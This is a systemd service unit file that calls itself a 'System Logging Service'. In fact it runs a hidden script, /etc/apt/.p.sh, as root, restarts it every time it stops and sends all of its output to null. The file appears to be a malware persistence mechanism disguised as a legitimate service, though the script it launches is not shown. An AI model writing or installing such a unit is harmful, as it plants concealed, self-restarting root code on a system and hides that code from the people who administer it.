[Unit]
Description= System Logging Service
After=network.target

[Service]
ExecStart=/bin/bash /etc/apt/.p.sh
Restart=always
Slice=null
RestartSec=15s  # Wait longer before restarting
StartLimitBurst=5
StartLimitInterval=300
User=root
StandardOutput=null
StandardError=null

[Install]
WantedBy=multi-user.target
